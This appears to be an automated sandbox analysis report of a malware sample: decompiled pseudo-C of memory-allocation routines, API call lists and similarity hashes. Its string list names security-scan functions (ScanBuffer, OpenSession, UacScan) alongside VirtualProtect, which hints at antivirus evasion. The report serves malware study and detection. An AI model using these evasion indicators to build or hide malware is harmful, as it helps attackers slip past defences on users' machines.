                                                                                                				_t36 = _t29;
                                                                                                				if(_t36 < 0) {
                                                                                                					goto L9;
                                                                                                				}
                                                                                                				asm("outsb");
                                                                                                				_push(0x2194598);
                                                                                                				if(_t36 >= 0) {
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				_t32 =  *(_t29 + 0x6e) * 0xffffff00;
                                                                                                				 *0x21876b8 =  *0x21876b8 - 1;
                                                                                                				 *_t15 =  *_t15 + _t15;
                                                                                                				 *0x021945FB =  *((intOrPtr*)(0x21945fb)) + 0x21876b8;
                                                                                                				asm("popad");
                                                                                                				asm("outsb");
                                                                                                				if(0x21876b9 != 0) {
                                                                                                					goto L12;
                                                                                                				}
                                                                                                				asm("o16 jb 0x4");
                                                                                                				_v117 = _v117 + 0x21876b9;
                                                                                                				_push(_t32);
                                                                                                				_t33 = _t34;
                                                                                                				_push(_t22);
                                                                                                				_t23 = 0x47;
                                                                                                				do {
                                                                                                					_push(0);
                                                                                                					_push(0);
                                                                                                					_t23 = _t23 - 1;
                                                                                                				} while (_t23 != 0);
                                                                                                				_t6 =  &_v8;
                                                                                                				 *_t6 = _t23;
                                                                                                				_push(0x2194598);
                                                                                                				_push(_t29);
                                                                                                				_v12 =  *_t6;
                                                                                                				_v8 = _t15;
                                                                                                				_t13 = 0;
                                                                                                				_push(_t33);
                                                                                                				_push(0x218768e);
                                                                                                				_push( *[fs:eax]);
                                                                                                				 *[fs:eax] = _t34;
                                                                                                				goto L8;
                                                                                                			}





















                                                                                                APIs
                                                                                                • InetIsOffline.URL(00000000,00000000,0218768E,?,?,?,?,00000000,00000000), ref: 021863C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: InetOffline
                                                                                                • String ID: OpenSession$ScanBuffer$UacScan$VirtualAlloc$VirtualProtect$kernel32$teSe
                                                                                                • API String ID: 3180263700-2221745942
                                                                                                • Opcode ID: 9c5fe72c77ae050e8ad31589976df1fcd5059f7d5a0af21372b7b10d9168a1c7
                                                                                                • Instruction ID: f6dc334c6bc0c138fbbd3a8aeb97f9d1eee7e08e779a92020755f75034216392
                                                                                                • Opcode Fuzzy Hash: 9c5fe72c77ae050e8ad31589976df1fcd5059f7d5a0af21372b7b10d9168a1c7
                                                                                                • Instruction Fuzzy Hash: B6A2FF39AC01199FEB21FB64D8C4EDEB7F6AF85700F2044E6A405AB254DB30AE46CF55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 67%
                                                                                                			E02171754(signed int __eax) {
                                                                                                				signed int __ebx;
                                                                                                				signed int __edi;
                                                                                                				signed int __esi;
                                                                                                				void* _t96;
                                                                                                				void** _t99;
                                                                                                				signed int _t104;
                                                                                                				signed int _t109;
                                                                                                				signed int _t110;
                                                                                                				intOrPtr* _t114;
                                                                                                				void* _t116;
                                                                                                				void* _t121;
                                                                                                				signed int _t125;
                                                                                                				signed int _t129;
                                                                                                				signed int _t131;
                                                                                                				signed int _t132;
                                                                                                				signed int _t133;
                                                                                                				signed int _t134;
                                                                                                				signed int _t135;
                                                                                                				unsigned int _t141;
                                                                                                				signed int _t142;
                                                                                                				void* _t144;
                                                                                                				void* _t147;
                                                                                                				intOrPtr _t148;
                                                                                                				signed int _t150;
                                                                                                				long _t156;
                                                                                                				intOrPtr _t159;
                                                                                                				signed int _t162;
                                                                                                
                                                                                                				_t129 =  *0x2191045; // 0x0
                                                                                                				if(__eax > 0xa2c) {
                                                                                                					__eflags = __eax - 0x40a2c;
                                                                                                					if(__eax > 0x40a2c) {
                                                                                                						_pop(_t120);
                                                                                                						__eflags = __eax;
                                                                                                						if(__eax >= 0) {
                                                                                                							_push(_t120);
                                                                                                							_t162 = __eax;
                                                                                                							_t156 = __eax + 0x00010010 - 0x00000001 + 0x00000004 & 0xffff0000;
                                                                                                							_t96 = VirtualAlloc(0, _t156, 0x101000, 4); // executed
                                                                                                							_t121 = _t96;
                                                                                                							if(_t121 != 0) {
                                                                                                								_t147 = _t121;
                                                                                                								 *((intOrPtr*)(_t147 + 8)) = _t162;
                                                                                                								 *(_t147 + 0xc) = _t156 | 0x00000004;
                                                                                                								E02171674();
                                                                                                								_t99 =  *0x21937a8; // 0x7f9f0000
                                                                                                								 *_t147 = 0x21937a4;
                                                                                                								 *0x21937a8 = _t121;
                                                                                                								 *(_t147 + 4) = _t99;
                                                                                                								 *_t99 = _t121;
                                                                                                								 *0x21937a0 = 0;
                                                                                                								_t121 = _t121 + 0x10;
                                                                                                							}
                                                                                                							return _t121;
                                                                                                						} else {
                                                                                                							__eflags = 0;
                                                                                                							return 0;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t125 = (__eax + 0x000000d3 & 0xffffff00) + 0x30;
                                                                                                						__eflags = _t129;
                                                                                                						if(__eflags != 0) {
                                                                                                							while(1) {
                                                                                                								asm("lock cmpxchg [0x2191710], ah");
                                                                                                								if(__eflags == 0) {
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								Sleep(0);
                                                                                                								asm("lock cmpxchg [0x2191710], ah");
                                                                                                								if(__eflags != 0) {
                                                                                                									Sleep(0xa);
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L39;
                                                                                                							}
                                                                                                						}
                                                                                                						L39:
                                                                                                						_t141 = _t125 - 0xb30;
                                                                                                						_t142 = _t141 >> 0xd;
                                                                                                						_t131 = _t141 >> 8;
                                                                                                						_t104 = 0xffffffff << _t131 &  *(0x2191720 + _t142 * 4);
                                                                                                						__eflags = 0xffffffff;
                                                                                                						if(0xffffffff == 0) {
                                                                                                							_t132 = _t142;
                                                                                                							__eflags = 0xfffffffe << _t132 &  *0x219171c;
                                                                                                							if((0xfffffffe << _t132 &  *0x219171c) == 0) {
                                                                                                								_t133 =  *0x2191718; // 0x4fcd0
                                                                                                								_t134 = _t133 - _t125;
                                                                                                								__eflags = _t134;
                                                                                                								if(_t134 < 0) {
                                                                                                									_t109 = E021715FC(_t125);
                                                                                                								} else {
                                                                                                									_t110 =  *0x2191714; // 0x4a7fce0
                                                                                                									_t109 = _t110 - _t125;
                                                                                                									 *0x2191714 = _t109;
                                                                                                									 *0x2191718 = _t134;
                                                                                                									 *(_t109 - 4) = _t125 | 0x00000002;
                                                                                                								}
                                                                                                								 *0x2191710 = 0;
                                                                                                								return _t109;
                                                                                                							} else {
                                                                                                								asm("bsf edx, eax");
                                                                                                								asm("bsf ecx, eax");
                                                                                                								_t135 = _t132 | _t142 << 0x00000005;
                                                                                                								goto L47;
                                                                                                							}
                                                                                                						} else {
                                                                                                							asm("bsf eax, eax");
                                                                                                							_t135 = _t131 & 0xffffffe0 | _t104;
                                                                                                							L47:
                                                                                                							_push(_t152);
                                                                                                							_push(_t145);
                                                                                                							_t148 = 0x21917a0 + _t135 * 8;
                                                                                                							_t159 =  *((intOrPtr*)(_t148 + 4));
                                                                                                							_t114 =  *((intOrPtr*)(_t159 + 4));
                                                                                                							 *((intOrPtr*)(_t148 + 4)) = _t114;
                                                                                                							 *_t114 = _t148;
                                                                                                							__eflags = _t148 - _t114;
                                                                                                							if(_t148 == _t114) {
                                                                                                								asm("rol eax, cl");
                                                                                                								_t80 = 0x2191720 + _t142 * 4;
                                                                                                								 *_t80 =  *(0x2191720 + _t142 * 4) & 0xfffffffe;
                                                                                                								__eflags =  *_t80;
                                                                                                								if( *_t80 == 0) {
                                                                                                									asm("btr [0x219171c], edx");
                                                                                                								}
                                                                                                							}
                                                                                                							_t150 = 0xfffffff0 &  *(_t159 - 4);
                                                                                                							_t144 = 0xfffffff0 - _t125;
                                                                                                							__eflags = 0xfffffff0;
                                                                                                							if(0xfffffff0 == 0) {
                                                                                                								_t89 =  &((_t159 - 4)[0xfffffffffffffffc]);
                                                                                                								 *_t89 =  *(_t159 - 4 + _t150) & 0x000000f7;
                                                                                                								__eflags =  *_t89;
                                                                                                							} else {
                                                                                                								_t116 = _t125 + _t159;
                                                                                                								 *((intOrPtr*)(_t116 - 4)) = 0xfffffffffffffff3;
                                                                                                								 *(0xfffffff0 + _t116 - 8) = 0xfffffff0;
                                                                                                								__eflags = 0xfffffff0 - 0xb30;
                                                                                                								if(0xfffffff0 >= 0xb30) {
                                                                                                									E02171530(_t116, 0xfffffffffffffff3, _t144);
                                                                                                								}
                                                                                                							}
                                                                                                							 *(_t159 - 4) = _t125 + 2;
                                                                                                							 *0x2191710 = 0;
                                                                                                							return _t159;
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					__eflags = __cl;
                                                                                                					__eax =  *(__edx + 0x21915b8) & 0x000000ff;
                                                                                                					__ebx = 0x2190044 + ( *(__edx + 0x21915b8) & 0x000000ff) * 8;
                                                                                                					if(__eflags != 0) {
                                                                                                						while(1) {
                                                                                                							__eax = 0x100;
                                                                                                							asm("lock cmpxchg [ebx], ah");
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L5;
                                                                                                							}
                                                                                                							__ebx = __ebx + 0x20;
                                                                                                							__eflags = __ebx;
                                                                                                							__eax = 0x100;
                                                                                                							asm("lock cmpxchg [ebx], ah");
                                                                                                							if(__ebx != 0) {
                                                                                                								__ebx = __ebx + 0x20;
                                                                                                								__eflags = __ebx;
                                                                                                								__eax = 0x100;
                                                                                                								asm("lock cmpxchg [ebx], ah");
                                                                                                								if(__ebx != 0) {
                                                                                                									__ebx = __ebx - 0x40;
                                                                                                									__eflags = __ebx;
                                                                                                									Sleep(0);
                                                                                                									__eax = 0x100;
                                                                                                									asm("lock cmpxchg [ebx], ah");
                                                                                                									if(__eflags != 0) {
                                                                                                										Sleep(0xa);
                                                                                                										continue;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					}
                                                                                                					L5:
                                                                                                					__edx =  *(__ebx + 4);
                                                                                                					__eax =  *(__edx + 8);
                                                                                                					__ecx = 0xfffffff8;
                                                                                                					__eflags = __edx - __ebx;
                                                                                                					if(__edx == __ebx) {
                                                                                                						__edx =  *(__ebx + 0x10);
                                                                                                						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                                						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                                                                						__eflags = __eax -  *(__ebx + 0xc);
                                                                                                						if(__eax >  *(__ebx + 0xc)) {
                                                                                                							_push(__esi);
                                                                                                							_push(__edi);
                                                                                                							__eflags =  *0x2191045;
                                                                                                							if(__eflags != 0) {
                                                                                                								while(1) {
                                                                                                									__eax = 0x100;
                                                                                                									asm("lock cmpxchg [0x2191710], ah");
                                                                                                									if(__eflags == 0) {
                                                                                                										goto L20;
                                                                                                									}
                                                                                                									Sleep(0);
                                                                                                									__eax = 0x100;
                                                                                                									asm("lock cmpxchg [0x2191710], ah");
                                                                                                									if(__eflags != 0) {
                                                                                                										Sleep(0xa);
                                                                                                										continue;
                                                                                                									}
                                                                                                									goto L20;
                                                                                                								}
                                                                                                							}
                                                                                                							L20:
                                                                                                							 *(__ebx + 1) =  *(__ebx + 1) &  *0x219171c;
                                                                                                							__eflags =  *(__ebx + 1) &  *0x219171c;
                                                                                                							if(( *(__ebx + 1) &  *0x219171c) == 0) {
                                                                                                								__ecx =  *(__ebx + 0x18) & 0x0000ffff;
                                                                                                								__edi =  *0x2191718; // 0x4fcd0
                                                                                                								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff);
                                                                                                								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) {
                                                                                                									__eax =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                                                									__edi = __eax;
                                                                                                									__eax = E021715FC(__eax);
                                                                                                									__esi = __eax;
                                                                                                									__eflags = __eax;
                                                                                                									if(__eax != 0) {
                                                                                                										goto L33;
                                                                                                									} else {
                                                                                                										 *0x2191710 = __al;
                                                                                                										 *__ebx = __al;
                                                                                                										_pop(__edi);
                                                                                                										_pop(__esi);
                                                                                                										_pop(__ebx);
                                                                                                										return __eax;
                                                                                                									}
                                                                                                								} else {
                                                                                                									__esi =  *0x2191714; // 0x4a7fce0
                                                                                                									__ecx =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                                                									__edx = __ecx + 0xb30;
                                                                                                									__eflags = __edi - __ecx + 0xb30;
                                                                                                									if(__edi >= __ecx + 0xb30) {
                                                                                                										__edi = __ecx;
                                                                                                									}
                                                                                                									__esi = __esi - __edi;
                                                                                                									 *0x2191718 =  *0x2191718 - __edi;
                                                                                                									 *0x2191714 = __esi;
                                                                                                									goto L33;
                                                                                                								}
                                                                                                							} else {
                                                                                                								asm("bsf eax, esi");
                                                                                                								__esi = __eax * 8;
                                                                                                								__ecx =  *(0x2191720 + __eax * 4);
                                                                                                								asm("bsf ecx, ecx");
                                                                                                								__ecx =  *(0x2191720 + __eax * 4) + __eax * 8 * 4;
                                                                                                								__edi = 0x21917a0 + ( *(0x2191720 + __eax * 4) + __eax * 8 * 4) * 8;
                                                                                                								__esi =  *(__edi + 4);
                                                                                                								__edx =  *(__esi + 4);
                                                                                                								 *(__edi + 4) = __edx;
                                                                                                								 *__edx = __edi;
                                                                                                								__eflags = __edi - __edx;
                                                                                                								if(__edi == __edx) {
                                                                                                									__edx = 0xfffffffe;
                                                                                                									asm("rol edx, cl");
                                                                                                									_t38 = 0x2191720 + __eax * 4;
                                                                                                									 *_t38 =  *(0x2191720 + __eax * 4) & 0xfffffffe;
                                                                                                									__eflags =  *_t38;
                                                                                                									if( *_t38 == 0) {
                                                                                                										asm("btr [0x219171c], eax");
                                                                                                									}
                                                                                                								}
                                                                                                								__edi = 0xfffffff0;
                                                                                                								__edi = 0xfffffff0 &  *(__esi - 4);
                                                                                                								__eflags = 0xfffffff0 - 0x10a60;
                                                                                                								if(0xfffffff0 < 0x10a60) {
                                                                                                									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                                                                									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                                                                									__eflags =  *_t52;
                                                                                                								} else {
                                                                                                									__edx = __edi;
                                                                                                									__edi =  *(__ebx + 0x1a) & 0x0000ffff;
                                                                                                									__edx = __edx - __edi;
                                                                                                									__eax = __edi + __esi;
                                                                                                									__ecx = __edx + 3;
                                                                                                									 *(__eax - 4) = __ecx;
                                                                                                									 *(__edx + __eax - 8) = __edx;
                                                                                                									__eax = E02171530(__eax, __ecx, __edx);
                                                                                                								}
                                                                                                								L33:
                                                                                                								_t56 = __edi + 6; // 0x4fcd6
                                                                                                								__ecx = _t56;
                                                                                                								 *(__esi - 4) = _t56;
                                                                                                								__eax = 0;
                                                                                                								 *0x2191710 = __al;
                                                                                                								 *__esi = __ebx;
                                                                                                								 *((intOrPtr*)(__esi + 8)) = 0;
                                                                                                								 *((intOrPtr*)(__esi + 0xc)) = 1;
                                                                                                								 *(__ebx + 0x10) = __esi;
                                                                                                								_t61 = __esi + 0x20; // 0x4a7fd00
                                                                                                								__eax = _t61;
                                                                                                								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                                								__edx = __ecx + __eax;
                                                                                                								 *(__ebx + 8) = __ecx + __eax;
                                                                                                								__edi = __edi + __esi;
                                                                                                								__edi = __edi - __ecx;
                                                                                                								__eflags = __edi;
                                                                                                								 *(__ebx + 0xc) = __edi;
                                                                                                								 *__ebx = 0;
                                                                                                								 *(__eax - 4) = __esi;
                                                                                                								_pop(__edi);
                                                                                                								_pop(__esi);
                                                                                                								_pop(__ebx);
                                                                                                								return __eax;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t19 = __edx + 0xc;
                                                                                                							 *_t19 =  *(__edx + 0xc) + 1;
                                                                                                							__eflags =  *_t19;
                                                                                                							 *(__ebx + 8) = __ecx;
                                                                                                							 *__ebx = 0;
                                                                                                							 *(__eax - 4) = __edx;
                                                                                                							_pop(__ebx);
                                                                                                							return __eax;
                                                                                                						}
                                                                                                					} else {
                                                                                                						 *(__edx + 0xc) =  *(__edx + 0xc) + 1;
                                                                                                						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                                                                						__eflags = 0xfffffff8;
                                                                                                						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4);
                                                                                                						 *(__eax - 4) = __edx;
                                                                                                						if(0xfffffff8 == 0) {
                                                                                                							__ecx =  *(__edx + 4);
                                                                                                							 *(__ecx + 0x14) = __ebx;
                                                                                                							 *(__ebx + 4) = __ecx;
                                                                                                							 *__ebx = 0;
                                                                                                							_pop(__ebx);
                                                                                                							return __eax;
                                                                                                						} else {
                                                                                                							 *__ebx = 0;
                                                                                                							_pop(__ebx);
                                                                                                							return __eax;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}






























                                                                                                0x0217182b
                                                                                                0x02171830
                                                                                                0x02171838
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0217183c
                                                                                                0x02171841
                                                                                                0x02171846
                                                                                                0x0217184e
                                                                                                0x02171852
                                                                                                0x00000000
                                                                                                0x02171852
                                                                                                0x00000000
                                                                                                0x0217184e
                                                                                                0x0217182b
                                                                                                0x0217185c
                                                                                                0x02171860
                                                                                                0x02171860
                                                                                                0x02171866
                                                                                                0x021718d8
                                                                                                0x021718dc
                                                                                                0x021718e2
                                                                                                0x021718e4
                                                                                                0x0217190c
                                                                                                0x02171910
                                                                                                0x02171912
                                                                                                0x02171917
                                                                                                0x02171919
                                                                                                0x0217191b
                                                                                                0x00000000
                                                                                                0x0217191d
                                                                                                0x0217191d
                                                                                                0x02171922
                                                                                                0x02171924
                                                                                                0x02171925
                                                                                                0x02171926
                                                                                                0x02171927
                                                                                                0x02171927
                                                                                                0x021718e6
                                                                                                0x021718e6
                                                                                                0x021718ec
                                                                                                0x021718f0
                                                                                                0x021718f6
                                                                                                0x021718f8
                                                                                                0x021718fa
                                                                                                0x021718fa
                                                                                                0x021718fc
                                                                                                0x021718fe
                                                                                                0x02171904
                                                                                                0x00000000
                                                                                                0x02171904
                                                                                                0x02171868
                                                                                                0x02171868
                                                                                                0x0217186b
                                                                                                0x02171872
                                                                                                0x02171879
                                                                                                0x0217187c
                                                                                                0x0217187f
                                                                                                0x02171886
                                                                                                0x02171889
                                                                                                0x0217188c
                                                                                                0x0217188f
                                                                                                0x02171891
                                                                                                0x02171893
                                                                                                0x02171895
                                                                                                0x0217189a
                                                                                                0x0217189c
                                                                                                0x0217189c
                                                                                                0x0217189c
                                                                                                0x021718a3
                                                                                                0x021718a5
                                                                                                0x021718a5
                                                                                                0x021718a3
                                                                                                0x021718ac
                                                                                                0x021718b1
                                                                                                0x021718b4
                                                                                                0x021718ba
                                                                                                0x02171928
                                                                                                0x02171928
                                                                                                0x02171928
                                                                                                0x021718bc
                                                                                                0x021718bc
                                                                                                0x021718be
                                                                                                0x021718c2
                                                                                                0x021718c4
                                                                                                0x021718c7
                                                                                                0x021718ca
                                                                                                0x021718cd
                                                                                                0x021718d1
                                                                                                0x021718d1
                                                                                                0x0217192d
                                                                                                0x0217192d
                                                                                                0x0217192d
                                                                                                0x02171930
                                                                                                0x02171933
                                                                                                0x02171935
                                                                                                0x0217193a
                                                                                                0x0217193c
                                                                                                0x0217193f
                                                                                                0x02171946
                                                                                                0x02171949
                                                                                                0x02171949
                                                                                                0x0217194c
                                                                                                0x02171950
                                                                                                0x02171953
                                                                                                0x02171956
                                                                                                0x02171958
                                                                                                0x02171958
                                                                                                0x0217195a
                                                                                                0x0217195d
                                                                                                0x02171960
                                                                                                0x02171963
                                                                                                0x02171964
                                                                                                0x02171965
                                                                                                0x02171966
                                                                                                0x02171966
                                                                                                0x021717b2
                                                                                                0x021717b2
                                                                                                0x021717b2
                                                                                                0x021717b2
                                                                                                0x021717b6
                                                                                                0x021717b9
                                                                                                0x021717bc
                                                                                                0x021717bf
                                                                                                0x021717c0
                                                                                                0x021717c0
                                                                                                0x0217178d
                                                                                                0x0217178d
                                                                                                0x02171791
                                                                                                0x02171791
                                                                                                0x02171794
                                                                                                0x02171797
                                                                                                0x0217179a
                                                                                                0x021717c4
                                                                                                0x021717c7
                                                                                                0x021717ca
                                                                                                0x021717cd
                                                                                                0x021717d0
                                                                                                0x021717d1
                                                                                                0x0217179c
                                                                                                0x0217179c
                                                                                                0x0217179f
                                                                                                0x021717a0
                                                                                                0x021717a0
                                                                                                0x0217179a
                                                                                                0x0217178b

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00000000), ref: 02171800
                                                                                                • Sleep.KERNEL32(0000000A,00000000), ref: 02171816
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.308152045.0000000002171000.00000020.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: true
                                                                                                • Associated: 00000000.00000002.308138611.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000000.00000002.308329910.0000000002190000.00000004.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2170000_0321423605241625.jbxd
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: e152b5d178c74bc91aa123ad5b31e2dd9c074c42e9353793cb1d4153c34712c4
                                                                                                • Instruction ID: a862c91122a91cff800dca998546077c970015a486fdc89bbc96897ca787a23c
                                                                                                • Opcode Fuzzy Hash: e152b5d178c74bc91aa123ad5b31e2dd9c074c42e9353793cb1d4153c34712c4
                                                                                                • Instruction Fuzzy Hash: D3B12276A80252AFC719CF68D480356BBF2FBC5310F1886AED45D8B385C77195D2CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph (legend: Executed, Not Executed)
                                                                                                C-Code - Quality: 91%
                                                                                                			E02171ABC(void* __eax, void* __edi) {
                                                                                                				signed int __ebx;
                                                                                                				void* _t50;
                                                                                                				signed int _t51;
                                                                                                				signed int _t52;
                                                                                                				signed int _t54;
                                                                                                				void _t57;
                                                                                                				int _t58;
                                                                                                				signed int _t65;
                                                                                                				void* _t67;
                                                                                                				signed int _t69;
                                                                                                				intOrPtr _t70;
                                                                                                				signed int _t75;
                                                                                                				signed int _t76;
                                                                                                				signed int _t77;
                                                                                                				void* _t79;
                                                                                                				void* _t82;
                                                                                                				void _t85;
                                                                                                				void* _t87;
                                                                                                				void* _t89;
                                                                                                
                                                                                                				_t48 = __eax;
                                                                                                				_t77 =  *(__eax - 4);
                                                                                                				_t65 =  *0x2191045; // 0x0
                                                                                                				if((_t77 & 0x00000007) != 0) {
                                                                                                					__eflags = _t77 & 0x00000005;
                                                                                                					if((_t77 & 0x00000005) != 0) {
                                                                                                						_pop(_t65);
                                                                                                						__eflags = _t77 & 0x00000003;
                                                                                                						if((_t77 & 0x00000003) != 0) {
                                                                                                							return 0xffffffff;
                                                                                                						} else {
                                                                                                							_push(_t65);
                                                                                                							_t67 = __eax - 0x10;
                                                                                                							E02171674();
                                                                                                							_t50 = _t67;
                                                                                                							_t85 =  *_t50;
                                                                                                							_t82 =  *(_t50 + 4);
                                                                                                							_t51 = VirtualFree(_t67, 0, 0x8000); // executed
                                                                                                							if(_t51 == 0) {
                                                                                                								_t52 = _t51 | 0xffffffff;
                                                                                                								__eflags = _t52;
                                                                                                							} else {
                                                                                                								 *_t82 = _t85;
                                                                                                								 *(_t85 + 4) = _t82;
                                                                                                								_t52 = 0;
                                                                                                							}
                                                                                                							 *0x21937a0 = 0;
                                                                                                							return _t52;
                                                                                                						}
                                                                                                					} else {
                                                                                                						goto L21;
                                                                                                					}
                                                                                                				} else {
                                                                                                					__eflags = __bl;
                                                                                                					__ebx =  *__edx;
                                                                                                					if(__eflags != 0) {
                                                                                                						while(1) {
                                                                                                							__eax = 0x100;
                                                                                                							asm("lock cmpxchg [ebx], ah");
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L6;
                                                                                                							}
                                                                                                							Sleep(0);
                                                                                                							__edx = __edx;
                                                                                                							__ecx = __ecx;
                                                                                                							__eax = 0x100;
                                                                                                							asm("lock cmpxchg [ebx], ah");
                                                                                                							if(__eflags != 0) {
                                                                                                								Sleep(0xa);
                                                                                                								__edx = __edx;
                                                                                                								__ecx = __ecx;
                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L6;
                                                                                                						}
                                                                                                					}
                                                                                                					L6:
                                                                                                					_t6 = __edx + 0xc;
                                                                                                					 *_t6 =  *(__edx + 0xc) - 1;
                                                                                                					__eflags =  *_t6;
                                                                                                					__eax =  *(__edx + 8);
                                                                                                					if( *_t6 == 0) {
                                                                                                						__eflags = __eax;
                                                                                                						if(__eax == 0) {
                                                                                                							L12:
                                                                                                							 *(__ebx + 0xc) = __eax;
                                                                                                						} else {
                                                                                                							__eax =  *(__edx + 0x14);
                                                                                                							__ecx =  *(__edx + 4);
                                                                                                							 *(__eax + 4) = __ecx;
                                                                                                							 *(__ecx + 0x14) = __eax;
                                                                                                							__eax = 0;
                                                                                                							__eflags =  *((intOrPtr*)(__ebx + 0x10)) - __edx;
                                                                                                							if( *((intOrPtr*)(__ebx + 0x10)) == __edx) {
                                                                                                								goto L12;
                                                                                                							}
                                                                                                						}
                                                                                                						 *__ebx = __al;
                                                                                                						__eax = __edx;
                                                                                                						__edx =  *(__edx - 4);
                                                                                                						__bl =  *0x2191045; // 0x0
                                                                                                						L21:
                                                                                                						__eflags = _t65;
                                                                                                						_t69 = _t77 & 0xfffffff0;
                                                                                                						_push(_t84);
                                                                                                						_t87 = _t48;
                                                                                                						if(__eflags != 0) {
                                                                                                							while(1) {
                                                                                                								_t54 = 0x100;
                                                                                                								asm("lock cmpxchg [0x2191710], ah");
                                                                                                								if(__eflags == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								Sleep(0);
                                                                                                								_t54 = 0x100;
                                                                                                								asm("lock cmpxchg [0x2191710], ah");
                                                                                                								if(__eflags != 0) {
                                                                                                									Sleep(0xa);
                                                                                                									continue;
                                                                                                								}
                                                                                                								goto L22;
                                                                                                							}
                                                                                                						}
                                                                                                						L22:
                                                                                                						__eflags = (_t87 - 4)[_t69] & 0x00000001;
                                                                                                						_t75 = (_t87 - 4)[_t69];
                                                                                                						if(((_t87 - 4)[_t69] & 0x00000001) != 0) {
                                                                                                							_t54 = _t69 + _t87;
                                                                                                							_t76 = _t75 & 0xfffffff0;
                                                                                                							_t69 = _t69 + _t76;
                                                                                                							__eflags = _t76 - 0xb30;
                                                                                                							if(_t76 >= 0xb30) {
                                                                                                								_t54 = E021714F0(_t54);
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t76 = _t75 | 0x00000008;
                                                                                                							__eflags = _t76;
                                                                                                							(_t87 - 4)[_t69] = _t76;
                                                                                                						}
                                                                                                						__eflags =  *(_t87 - 4) & 0x00000008;
                                                                                                						if(( *(_t87 - 4) & 0x00000008) != 0) {
                                                                                                							_t76 =  *(_t87 - 8);
                                                                                                							_t87 = _t87 - _t76;
                                                                                                							_t69 = _t69 + _t76;
                                                                                                							__eflags = _t76 - 0xb30;
                                                                                                							if(_t76 >= 0xb30) {
                                                                                                								_t54 = E021714F0(_t87);
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags = _t69 - 0x13fff0;
                                                                                                						if(_t69 == 0x13fff0) {
                                                                                                							__eflags =  *0x2191718 - 0x13fff0;
                                                                                                							if( *0x2191718 != 0x13fff0) {
                                                                                                								_t70 = _t87 + 0x13fff0;
                                                                                                								E02171590(_t54);
                                                                                                								 *((intOrPtr*)(_t70 - 4)) = 2;
                                                                                                								 *0x2191718 = 0x13fff0;
                                                                                                								 *0x2191714 = _t70;
                                                                                                								 *0x2191710 = 0;
                                                                                                								__eflags = 0;
                                                                                                								return 0;
                                                                                                							} else {
                                                                                                								_t89 = _t87 - 0x10;
                                                                                                								_t57 =  *_t89;
                                                                                                								_t79 =  *(_t89 + 4);
                                                                                                								 *(_t57 + 4) = _t79;
                                                                                                								 *_t79 = _t57;
                                                                                                								 *0x2191710 = 0;
                                                                                                								_t58 = VirtualFree(_t89, 0, 0x8000);
                                                                                                								__eflags = _t58 - 1;
                                                                                                								asm("sbb eax, eax");
                                                                                                								return _t58;
                                                                                                							}
                                                                                                						} else {
                                                                                                							 *(_t87 - 4) = _t69 + 3;
                                                                                                							 *(_t87 - 8 + _t69) = _t69;
                                                                                                							E02171530(_t87, _t76, _t69);
                                                                                                							 *0x2191710 = 0;
                                                                                                							__eflags = 0;
                                                                                                							return 0;
                                                                                                						}
                                                                                                					} else {
                                                                                                						__eflags = __eax;
                                                                                                						 *(__edx + 8) = __ecx;
                                                                                                						 *(__ecx - 4) = __eax;
                                                                                                						if(__eflags == 0) {
                                                                                                							__ecx =  *(__ebx + 4);
                                                                                                							 *(__edx + 0x14) = __ebx;
                                                                                                							 *(__edx + 4) = __ecx;
                                                                                                							 *(__ecx + 0x14) = __edx;
                                                                                                							 *(__ebx + 4) = __edx;
                                                                                                							 *__ebx = 0;
                                                                                                							__eax = 0;
                                                                                                							__eflags = 0;
                                                                                                							_pop(__ebx);
                                                                                                							return 0;
                                                                                                						} else {
                                                                                                							__eax = 0;
                                                                                                							__eflags = 0;
                                                                                                							 *__ebx = __al;
                                                                                                							_pop(__ebx);
                                                                                                							return 0;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                			}






















                                                                                                0x02171aed
